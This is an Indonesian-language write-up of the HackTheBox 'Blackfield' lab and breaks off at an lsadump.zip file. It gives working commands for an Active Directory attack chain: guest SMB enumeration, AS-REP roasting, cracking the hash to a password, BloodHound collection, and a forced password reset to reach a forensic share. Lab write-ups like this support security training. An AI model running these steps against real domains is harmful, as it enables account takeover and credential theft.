Blackfield

Information Gathering

NMAP - Ports and Services

Nmap scan report for 10.10.10.192 (10.10.10.192)
Host is up (0.19s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-09 01:36:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49677/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Road to Users - support

SMB - User Enumeration

disini saya mencoba untuk mengakses SMB dengan guest user

┌──(me㉿justakazh)-[~/ctf/active/bloodhound-collect]
└─$ smbclient -L \\10.10.10.192 -U guest --password ''

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

guest user tidak dapat melihat folder forensic, namun profiles$ dapat diakses

┌──(me㉿justakazh)-[~/ctf/active/bloodhound-collect]
└─$ smbclient \\\\10.10.10.192\\profiles$ -U guest
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jun  3 23:47:12 2020
  ..                                  D        0  Wed Jun  3 23:47:12 2020
  AAlleni                             D        0  Wed Jun  3 23:47:11 2020
  ABarteski                           D        0  Wed Jun  3 23:47:11 2020
  ABekesz                             D        0  Wed Jun  3 23:47:11 2020
  ABenzies                            D        0  Wed Jun  3 23:47:11 2020
  ABiemiller                          D        0  Wed Jun  3 23:47:11 2020
  AChampken                           D        0  Wed Jun  3 23:47:11 2020
  ACheretei                           D        0  Wed Jun  3 23:47:11 2020
  ACsonaki                            D        0  Wed Jun  3 23:47:11 2020
  AHigchens                           D        0  Wed Jun  3 23:47:11 2020
  [ --- MORE --- ]

terdapat banyak folder, tetapi tidak memiliki isi file. berdasarkan nama foldernya "profiles$" ini mungkin adalah username list, jadi saya coba untuk simpan menjadi username

username from folder

AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
ACsonaki
AHigchens
AJaquemai
AKlado
AKoffenburger
AKollolli
AKruppe
AKubale
ALamerz
AMaceldon
AMasalunga
ANavay
ANesterova
ANeusse
AOkleshen
APustulka
ARotella
ASanwardeker
AShadaia
ASischo
ASpruce
ATakach
ATaueg
ATwardowski
audit2020
AWangenheim
AWorsey
AZigmunt
BBakajza
BBeloucif
BCarmitcheal
BConsultant
BErdossy
BGeminski
BLostal
BMannise
BNovrotsky
BRigiero
BSamkoses
BZandonella
CAcherman
CAkbari
CAldhowaihi
CArgyropolous
CDufrasne
CGronk
Chiucarello
Chiuccariello
CHoytal
CKijauskas
CKolbo
CMakutenas
CMorcillo
CSchandall
CSelters
CTolmie
DCecere
DChintalapalli
DCwilich
DGarbatiuc
DKemesies
DMatuka
DMedeme
DMeherek
DMetych
DPaskalev
DPriporov
DRusanovskaya
DVellela
DVogleson
DZwinak
EBoley
EEulau
EFeatherling
EFrixione
EJenorik
EKmilanovic
ElKatkowsky
EmaCaratenuto
EPalislamovic
EPryar
ESachhitello
ESariotti
ETurgano
EWojtila
FAlirezai
FBaldwind
FBroj
FDeblaquire
FDegeorgio
FianLaginja
FLasokowski
FPflum
FReffey
GaBelithe
Gareld
GBatowski
GForshalger
GGomane
GHisek
GMaroufkhani
GMerewether
GQuinniey
GRoswurm
GWiegard
HBlaziewske
HColantino
HConforto
HCunnally
HGougen
HKostova
IChristijr
IKoledo
IKotecky
ISantosi
JAngvall
JBehmoiras
JDanten
JDjouka
JKondziola
JLeytushsenior
JLuthner
JMoorehendrickson
JPistachio
JScima
JSebaali
JShoenherr
JShuselvt
KAmavisca
KAtolikian
KBrokinn
KCockeril
KColtart
KCyster
KDorney
KKoesno
KLangfur
KMahalik
KMasloch
KMibach
KParvankova
KPregnolato
KRasmor
KShievitz
KSojdelius
KTambourgi
KVlahopoulos
KZyballa
LBajewsky
LBaligand
LBarhamand
LBirer
LBobelis
LChippel
LChoffin
LCominelli
LDruge
LEzepek
LHyungkim
LKarabag
LKirousis
LKnade
LKrioua
LLefebvre
LLoeradeavilez
LMichoud
LTindall
LYturbe
MArcynski
MAthilakshmi
MAttravanam
MBrambini
MHatziantoniou
MHoerauf
MKermarrec
MKillberg
MLapesh
MMakhsous
MMerezio
MNaciri
MShanmugarajah
MSichkar
MTemko
MTipirneni
MTonuri
MVanarsdel
NBellibas
NDikoka
NGenevro
NGoddanti
NMrdirk
NPulido
NRonges
NSchepkie
NVanpraet
OBelghazi
OBushey
OHardybala
OLunas
ORbabka
PBourrat
PBozzelle
PBranti
PCapperella
PCurtz
PDoreste
PGegnas
PMasulla
PMendlinger
PParakat
PProvencer
PTesik
PVinkovich
PVirding
PWeinkaus
RBaliukonis
RBochare
RKrnjaic
RNemnich
RPoretsky
RStuehringer
RSzewczuga
RVallandas
RWeatherl
RWissor
SAbdulagatov
SAjowi
SAlguwaihes
SBonaparte
SBouzane
SChatin
SDellabitta
SDhodapkar
SEulert
SFadrigalan
SGolds
SGrifasi
SGtlinas
SHauht
SHederian
SHelregel
SKrulig
SLewrie
SMaskil
Smocker
SMoyta
SRaustiala
SReppond
SSicliano
SSilex
SSolsbak
STousignaut
support
svc_backup
SWhyte
SWynigear
TAwaysheh
TBadenbach
TCaffo
TCassalom
TEiselt
TFerencdo
TGaleazza
TKauten
TKnupke
TLintlop
TMusselli
TOust
TSlupka
TStausland
TZumpella
UCrofskey
UMarylebone
UPyrke
VBublavy
VButziger
VFuscca
VLitschauer
VMamchuk
VMarija
VOlaosun
VPapalouca
WSaldat
WVerzhbytska
WZelazny
XBemelen
XDadant
XDebes
XKonegni
XRykiel
YBleasdale
YHuftalin
YKivlen
YKozlicki
YNyirenda
YPredestin
YSeturino
YSkoropada
YVonebers
YZarpentine
ZAlatti
ZKrenselewski
ZMalaab
ZMiick
ZScozzari
ZTimofeeff
ZWausik

AS-REP ROAST

selanjutnya saya akan melakukan AS-REP ROAST dengan username tersebut

┌──(me㉿justakazh)-[~/ctf/blackfield]
└─$ impacket-GetNPUsers -dc-ip BLACKFIELD.local BLACKFIELD.local/ -usersfile ./users
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
[ --- SNIP --- ]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[email protected]:9df6b0bf4e0e044ac3fc97349dd79e31$3cc5868db318da8244436a9b7bf22f6b55f0f635581c98d4321d7074608155a3e357c9908061c6b13b77e8d2837b32d4bd3a118ae32dea6b618a6129a8afaa38fab199fc85be4dd1dce7ddf69c20f2ef9452ceb791c0df44f9da3f3e588af4a1f1894ad1056e2dc6a6486ee1d190a033c652d4db4a42fd089f047b55b06676389ed16e6f533e134afb9f142966bfbddd8ad1a7ed3e6160442640f187ef32bce3287982982ab910cec85fd3aa17374ad5b72818fcef88201b36d5d767cc1acdefbad26d7e807ea5b4217d0cadf54f26003c4ed48f3e017cf98ec4217922fee5eae7dee48441ca84970a15f6a38c21c8e046157cdc
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[ --- SNIP --- ]

disini kita mendapatkan support hash, simpan ke file dan mari kita crack

┌──(me㉿justakazh)-[~/ctf/blackfield]
└─$ hashcat support.hash /usr/share/wordlists/rockyou.txt  
[ --- SNIP --- ]
[email protected]:9df6b0bf4e0e044ac3fc97349dd79e31$3cc5868db318da8244436a9b7bf22f6b55f0f635581c98d4321d7074608155a3e357c9908061c6b13b77e8d2837b32d4bd3a118ae32dea6b618a6129a8afaa38fab199fc85be4dd1dce7ddf69c20f2ef9452ceb791c0df44f9da3f3e588af4a1f1894ad1056e2dc6a6486ee1d190a033c652d4db4a42fd089f047b55b06676389ed16e6f533e134afb9f142966bfbddd8ad1a7ed3e6160442640f187ef32bce3287982982ab910cec85fd3aa17374ad5b72818fcef88201b36d5d767cc1acdefbad26d7e807ea5b4217d0cadf54f26003c4ed48f3e017cf98ec4217922fee5eae7dee48441ca84970a15f6a38c21c8e046157cdc:#00^BlackKnight
[ --- SNIP --- ]

selanjutnya mari kita verify user tersebut

┌──(me㉿justakazh)-[~/ctf/blackfield]
└─$ nxc smb blackfield.local -u support -p '#00^BlackKnight' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight

Road to Administrator

saya akan melakukan enumerasi menggunakan bloodhound-python

┌──(me㉿justakazh)-[~/ctf/blackfield/bloodhound-collect]
└─$ bloodhound-python -u support -p '#00^BlackKnight' -c all -d blackfield.local -ns 10.10.10.192    
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user

WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -5] No address associated with hostname
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 43S

pada bloodhound dapat dilihat bahwa support user memiliki ForceChangePassword permission kepada audit2020, mari kita abuse

                                                                                                                                                                                                                                            
┌──(me㉿justakazh)-[~/ctf/blackfield/bloodhound-collect]
└─$ net rpc password "audit2020" "Abcde@123" -U "blackfield.local"/"support"%"#00^BlackKnight" -S "10.10.10.192"

selanjutnya mari kita verifikasi

┌──(me㉿justakazh)-[~/ctf/blackfield/bloodhound-collect]
└─$ nxc smb blackfield.local -u audit2020 -p 'Abcde@123' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Abcde@123 
SMB         10.10.10.192    445    DC01             [*] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share

disini saya berhasil merubah password audit2020, dapat dilihat bahwa audit2020 dapat melihat folder forensic pada smb, mari kita lihat isi dari folder tersebut

┌──(me㉿justakazh)-[~/ctf/blackfield/bloodhound-collect]
└─$ smbclient \\\\10.10.10.192\\forensic -U audit2020 --password 'Abcde@123'      
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Feb 23 20:03:16 2020
  ..                                  D        0  Sun Feb 23 20:03:16 2020
  commands_output                     D        0  Mon Feb 24 01:14:37 2020
  memory_analysis                     D        0  Fri May 29 03:28:33 2020
  tools                               D        0  Sun Feb 23 20:39:08 2020

                5102079 blocks of size 4096. 1672458 blocks available
smb: \>

mari download seluruh isi foldernya

┌──(me㉿justakazh)-[~/ctf/blackfield/loot]
    └─$ smbclient \\\\10.10.10.192\\forensic -U audit2020 --password 'Abcde@123'
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

pada memory_analysis terdapat lsadump.zip yang sepertinya menyimpan

PreviousHard NextReel

Last updated 11 months ago